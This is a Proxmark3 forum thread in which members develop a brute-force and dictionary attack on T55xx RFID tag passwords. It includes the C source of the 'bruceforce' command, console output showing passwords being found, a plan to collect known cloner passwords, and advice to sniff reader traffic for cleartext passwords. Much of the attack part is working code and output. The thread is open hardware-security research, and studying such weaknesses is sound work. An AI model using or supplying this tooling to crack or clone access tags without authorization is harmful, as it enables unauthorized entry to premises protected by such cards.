bruceforce attack for t55xx

Go_tus · 2015-11-06 18:47:57

Hi, everyone I think I would be nice to have a bruceforce attack for t55xx

[== Undefined ==]
proxmark3> lf t55xx dump
[0] 0x1D555555  00011101010101010101010101010101          
[1] 0x1D555555  00011101010101010101010101010101          
[2] 0x1D555555  00011101010101010101010101010101          
[3] 0x1D555555  00011101010101010101010101010101          
[4] 0x1D555555  00011101010101010101010101010101          
[5] 0x1D555555  00011101010101010101010101010101          
[6] 0x1D555555  00011101010101010101010101010101          
[7] 0x1D555555  00011101010101010101010101010101          
proxmark3> lf t55xx dump feedbeef
[0] 0x00107070  00000000000100000111000001110000          
[1] 0x1D555555  00011101010101010101010101010101          
[2] 0x55555555  01010101010101010101010101010101          
[3] 0x59555555  01011001010101010101010101010101          
[4] 0x00000000  00000000000000000000000000000000          
[5] 0x00000000  00000000000000000000000000000000          
[6] 0x00000000  00000000000000000000000000000000          
[7] 0xFEEDBEEF  11111110111011011011111011101111       

proxmark3> lf t55xx 
help             This help          
config           Set/Get T55XX configuration (modulation, inverted, offset, rate)          
detect           [1] Try detecting the tag modulation from reading the configuration block.          
read             <block> [password] -- Read T55xx block data (page 0) [optional password]          
write            <block> <data> [password] -- Write T55xx block data (page 0) [optional password]          
trace            [1] Show T55xx traceability data (page 1/ blk 0-1)          
info             [1] Show T55xx configuration data (page 0/ blk 0)          
dump             [password] Dump T55xx card block 0-7. [optional password]          
special          Show block changes with 64 different offsets          
bruceforce       BruceForce Attack to get Password          

proxmark3> lf t55xx bruceforce h
Usage:  lf t55xx bruceforce <start password> <end password>          
     <password>, OPTIONAL password 4bytes (8 hex symbols)          
          
Examples:          
      lf t55xx bruceforce           
      lf t55xx bruceforce feedbeef          
      lf t55xx bruceforce aaaaaaaa bbbbbbbb          
          
proxmark3> 
proxmark3> lf t55xx bruceforce feedbee0 feedbfff
Start Password feedbee0
  End Password feedbfff

pass [feedbee0] ........Modulation : FSK2a          
Bit Rate   : 4 - RF/50          
Inverted   : Yes          
Offset     : 0          
Block0     : 0x00107070          
          

Found Password = feedbeef
proxmark3>

meter · 2015-11-06 18:53:56

Are you developing a bruteforce for t55xx?
I have seen there is already an entry in this thread http://proxmark.org/forum/viewtopic.php?id=2405

Last edited by meter (2015-11-06 18:56:08)

marshmellow · 2015-11-06 19:09:13

It would take a long long time to brute force the pwd.

Go_tus · 2015-11-06 19:21:39

if 1 second per try at myself

Sorry wrong calculation it will be 136 years

Last edited by Go_tus (2015-11-06 19:56:50)

iceman · 2015-11-06 22:06:11

I suppose you are iterating with +1 increase,.. how do you verify that the pwd is correct?

Go_tus · 2015-11-07 02:59:29

I use trydetectmodulation. I am not quite sure but I have tested 2 tags with 2 different passwords.

Go_tus · 2015-11-24 06:53:12

Here it's a simple code by noob programmer

[== Undefined ==]
int usage_t55xx_bruceforce(){
    PrintAndLog("Usage: lf t55xx bruceforce <start password> <end password>");
    PrintAndLog("       password must be 4 bytes (8 hex symbols)");
    PrintAndLog("Examples:");
    PrintAndLog("       lf t55xx bruceforce aaaaaaaa bbbbbbbb");
    PrintAndLog("");
    return 0;
}
bool SubBruceForce(int password){
    uint8_t block = 0;
    UsbCommand c = {CMD_T55XX_READ_BLOCK, {0, block, 0}};
    c.d.asBytes[0] = 0x0;
    
    //Password mode
        c.arg[2] = password;
        c.d.asBytes[0] = 0x1;

    clearCommandBuffer();
    SendCommand(&c);
    if ( !WaitForResponseTimeout(CMD_ACK,NULL,2500) ) {
        PrintAndLog("command execution time out");
        return 2;
    }
    
    uint8_t got[12000];
    GetFromBigBuf(got,sizeof(got),0);
    WaitForResponse(CMD_ACK,NULL);
    setGraphBuf(got,12000);
    DemodBufferLen=0;
    return tryDetectModulation();
}
int CmdT55xxBruceForce(const char *Cmd){
    uint32_t start_password = 0x00000000; //start password
    uint32_t end_password   = 0xFFFFFFFF; //end   password
    uint8_t t[4];
    int res;
    int h;
    bool found = false;
    char cmdp = param_getchar(Cmd, 0);
    if (cmdp == 'h' || cmdp == 'H')
        return usage_t55xx_bruceforce();

    res = sscanf(Cmd,"%08x %08x",&start_password,&end_password);
    if (res < 2)
    return usage_t55xx_bruceforce();

    h = param_gethex(Cmd, 0,t,8);
    if (h == 0)
    start_password = t[0] << 24 | t[1] << 16 | t[2] << 8 | t[3];
    else
    return usage_t55xx_bruceforce();
    
    h = param_gethex(Cmd, 1,t,8);
    
    if (h == 0)
    end_password = t[0] << 24 | t[1] << 16 | t[2] << 8 | t[3];
    else
    return usage_t55xx_bruceforce();

    
    printf("Start Password %08x\n",start_password);
    printf("  End Password %08x\n",end_password);
    int i = start_password;
    if ((i % 0x100) != 0)
    printf("\n[%08x] ",i);
    while ((!found) && (i <= end_password)){
        found = SubBruceForce(i);
        if (found)
        break;
        
        if ((i % 0x100) == 0)
        fprintf(stdout,"\n[%08x] ",i);
        else
        fprintf(stdout,".");
        fflush(stdout);

        //usleep(1);
        i++;
    }
    
    printf("\n");
    if (found)
    printf("Found Password = %08x\n",i);
    else
    printf("NOT Found Last Password = %08x\n",i);
    
    return 0;
}
static command_t CommandTable[] =
{
  {"help",   CmdHelp,           1, "This help"},
  {"config", CmdT55xxSetConfig, 1, "Set/Get T55XX configuration (modulation, inverted, offset, rate)"},
  {"detect", CmdT55xxDetect,    0, "[1] Try detecting the tag modulation from reading the configuration block."},
  {"read",   CmdT55xxReadBlock, 0, "<block> [password] -- Read T55xx block data (page 0) [optional password]"},
  {"write",  CmdT55xxWriteBlock,0, "<block> <data> [password] -- Write T55xx block data (page 0) [optional password]"},
  {"trace",  CmdT55xxReadTrace, 0, "[1] Show T55xx traceability data (page 1/ blk 0-1)"},
  {"info",   CmdT55xxInfo,      0, "[1] Show T55xx configuration data (page 0/ blk 0)"},
  {"dump",   CmdT55xxDump,      0, "[password] Dump T55xx card block 0-7. [optional password]"},
  {"special", special,          0, "Show block changes with 64 different offsets"},
  {"bruceforce",CmdT55xxBruceForce,0,"BruceForce Attack to get Password"},
  {NULL, NULL, 0, NULL}
};

Last edited by Go_tus (2015-11-24 06:57:37)

iceman · 2015-11-27 17:43:46

I tried your code and made it a bit simpler.

Using the config block and detectModulation might not be the fastest way to detect a valid password but it works.

pm3 --> lf t55 brute 0 3
Search password  range [00000000 -> 00000003]
[00000000],
Password NOT found. Last tried: [00000004]
pm3 --> lf t55 brute 11223340 11223346
Search password  range [11223340 -> 11223346]
Chip Type  : T55x7
Modulation : ASK
Bit Rate   : 5 - RF/64
Inverted   : No
Offset     : 33
Block0     : 0x00148050


Password found [11223344]

iceman · 2015-12-01 13:11:29

I added some ideas from Piwi, and the bruteforce can now load a default_pwd.dic file with some easy pwds and the two known cloners pwd.

iceman · 2015-12-01 23:37:18

and some other fixes like cancel bruteforce via keyboard, showing the wrong end pwd when not found,...

If the PM3 community has more known passwords for t55xx cloners, now it would be nice to add them.

rbubba1911 · 2015-12-02 16:45:28

Hi Piwi,

I'll try (deseperatly) to compile your fork of pm3,

but I stuck on :
cmdhfmf.c:12:25: fatal error: cmdhfmfhard.h: No such file or directory
#include "cmdhfmfhard.h"

I try to build with :
LANG=C make UBUNTU_1404_QT4=1

I was looking into github from iceman and you, but I can't find these two files.

Could you point me in the right direction ?

Regards

iceman · 2015-12-02 17:32:07

Its in piwi's fork, branch hard_nested...

ref https://github.com/pwpiwi/proxmark3/blo … hfmfhard.h

iceman · 2015-12-02 17:36:04

but I noticed that piwis files was missing in my fork too.. I added them and push it to github.

rbubba1911 · 2015-12-02 18:00:34

Thanks a lot iceman,

with your help, I was able to compile successfully the Piwi fork and yours .

note : must use "make UBUNTU_1404_QT4=1" to build your fork

Big hello to my Sweden friends

Last edited by rbubba1911 (2015-12-02 19:12:55)

iceman · 2016-02-23 17:26:59

@rbubba1911, as a sidenote, I change the makefile, so you no longer require that extra parameter.

--

There were some questions about how this bruteforce works.

its quite simple, following go_tus original version, as mentioned an explained in this thread.

I just modified to to work a bit better.

The BF is a simple incremental one, where it starts with a number and goes up until it finds a working pwd.
It's a online BF, where you need the t55xx tag on your PM3. It works against the tag, not a reader.

there is two modes, one range scan from start number to end number, another one is loading dictionary (ie known pwds list) which it tries one by one.

The inner workings is the following part, where it tries to read Block 0 with a test pwd, and the verify part is that it tries to decode the block0 (config) to a working configblock. That is done inside the "trydetectmodulation" function.

This is also why it is so slow. Trying to decode a configblock takes quite much time. This is the only way to figure out if a pwd was correct or not. Its not perfect since the decoding can find non-existent but still a config block, it would then give a false positive answer about the pwd.

Running against the whole searchspace is not practical, however a dictionary list with pwds would be acceptable.
I've added such a one list with some defaults and some found known cloner pwds.

    !AquireData(T55x7_PAGE0, T55x7_CONFIGURATION_BLOCK, TRUE, testpwd))
    found = tryDetectModulation();

This command uses A) bruteforce to scan a number range
B) a dictionary attack
Usage: lf t55xx bruteforce <start password> <end password> [i <*.dic>]
password must be 4 bytes (8 hex symbols)
Options:
h - this help
<start_pwd> - 4 byte hex value to start pwd search at
<end_pwd> - 4 byte hex value to end pwd search at
i <*.dic> - loads a default keys dictionary file <*.dic>
Examples:
lf t55xx bruteforce aaaaaaaa bbbbbbbb
lf t55xx bruteforce i default_pwd.dic

Last edited by iceman (2016-02-23 17:30:01)

Apt-Get · 2016-02-23 20:28:28

Sorry if this is silly but would there not be a way to glitch this chip? probably faster than brute..

iceman · 2016-02-23 21:06:18

We are all open to solutions here, preferably not just products of the mind but actual implementations.
How are you suggesting we glitch the chip?

@marshmellow and I have been bouncing the idea of measure the exact startup time until the first response.
But we never got it past the idea stage. Its hard to measure the exact time to response...

marshmellow · 2016-02-23 21:36:00

iceman wrote:

We are all open to solutions here, preferably not just products of the mind but actual implementations.
How are you suggesting we glitch the chip?
@marshmellow and I have been bouncing the idea of measure the exact startup time until the first response.
But we never got it past the idea stage. Its hard to measure the exact time to response...

In my testing Using the pm3 and measuring the time there was no easy attack possible. The chip response delay appears to vary only slightly and no direct correlation could be made to the password input. although a full statistical analysis with significantly more testing might reveal something different.

Other ideas would likely require a teardown of the chip.

Last edited by marshmellow (2016-02-23 22:12:57)

ntk · 2016-02-24 16:16:41

moved to
http://www.proxmark.org/forum/viewtopic … 264#p20264

Last edited by ntk (2016-02-24 19:35:58)

iceman · 2016-02-24 19:02:55

One enhancement would be checking if MAXBLOCKS allows reading Block 7.
Next yes, searching whole keyspace takes 2.4years, but there is no garantee that the key is found early or late, hence stating the max time. You can get lucky and find it within 1min. When it comes to statiscally analysing the BF time estimate, well, its guess work at the best.

Marshmellow and I had an idea if the pwd checking function would do its checking bit by bit OR byte by byte. Hence making a oracle to look for. Every correct byte would give longer response times. This doesn't seem to be the case.
It looks like it responses within the same time span regardless.

Next is that once we send the right pwd, we don't know that until we analyse the response,.. and we need to know what that data might be on a unknown tag. Which go_tus choosed to look at block0 and the trydetectmodulation function.
This will give use a proper set of data which we can verify on unknown tags.

Next, this is a BF attack against a card.. Not against a reader.

If you want to attack a reader, try sniffing the traffic and read the password which is sent in clear.
Thats how ppl on the forum found the pwd for cloner tools.

You are mixing up all kinds of stuff in your ideas. Understand what is going on and find possible attack vectors given a specific situation and target.

ntk · 2016-02-24 19:45:00

moved to

http://www.proxmark.org/forum/viewtopic … 264#p20264

(oh dear I did not realise you answer here already iceman. Should continue here or on the the new one. Sorry

Last edited by ntk (2016-02-24 19:49:26)

marshmellow · 2016-02-24 19:53:44

sorry ntk, but the translation is too bad, the words are too many, and the value too little for me to bother even reading it anymore...

ntk · 2016-02-24 20:02:02

not just

iceman wrote:

... its guess work at the best.
.

, iceman

Strategic
Divide to conquer
Structured
Confusing the enemy
Rigid, like an army thoughtless and fearsom.

that is the way of a Roman wolf pack total attack, have you seen wolfs attack for food in Natur programs ...

ntk · 2016-02-24 20:11:44

dont worry Marshmellow, if you could find out even without knowing the password, copy the exact card data is possible, then for the next step not much words are needed.

I talk, I circle, I separate and think solution that is why it seems confusing to other

In the chaos there is senses and lights .... if it is none then we call it dead-end & darkness

Go_tus · 2016-02-25 02:37:19

Problem is searching and mining, in NP problem bruceforce maybe inpractical or even greedy, so I agree that maybe random is better in some cases.

Proxmark3 community

Announcement

#1 2015-11-06 18:47:57

bruceforce attack for t55xx

#2 2015-11-06 18:53:56

Re: bruceforce attack for t55xx

#3 2015-11-06 19:09:13

Re: bruceforce attack for t55xx

#4 2015-11-06 19:21:39

Re: bruceforce attack for t55xx

#5 2015-11-06 22:06:11

Re: bruceforce attack for t55xx

#6 2015-11-07 02:59:29

Re: bruceforce attack for t55xx

#7 2015-11-24 06:53:12

Re: bruceforce attack for t55xx

#8 2015-11-27 17:43:46

Re: bruceforce attack for t55xx

#9 2015-12-01 13:11:29

Re: bruceforce attack for t55xx

#10 2015-12-01 23:37:18

Re: bruceforce attack for t55xx

#11 2015-12-02 16:45:28

Re: bruceforce attack for t55xx

#12 2015-12-02 17:32:07

Re: bruceforce attack for t55xx

#13 2015-12-02 17:36:04

Re: bruceforce attack for t55xx

#14 2015-12-02 18:00:34

Re: bruceforce attack for t55xx

#15 2016-02-23 17:26:59

Re: bruceforce attack for t55xx

#16 2016-02-23 20:28:28

Re: bruceforce attack for t55xx

#17 2016-02-23 21:06:18

Re: bruceforce attack for t55xx

#18 2016-02-23 21:36:00

Re: bruceforce attack for t55xx

#19 2016-02-24 16:16:41

Re: bruceforce attack for t55xx

#20 2016-02-24 19:02:55

Re: bruceforce attack for t55xx

#21 2016-02-24 19:45:00

Re: bruceforce attack for t55xx

#22 2016-02-24 19:53:44

Re: bruceforce attack for t55xx

#23 2016-02-24 20:02:02

Re: bruceforce attack for t55xx

#24 2016-02-24 20:11:44

Re: bruceforce attack for t55xx

#25 2016-02-25 02:37:19

Re: bruceforce attack for t55xx

Board footer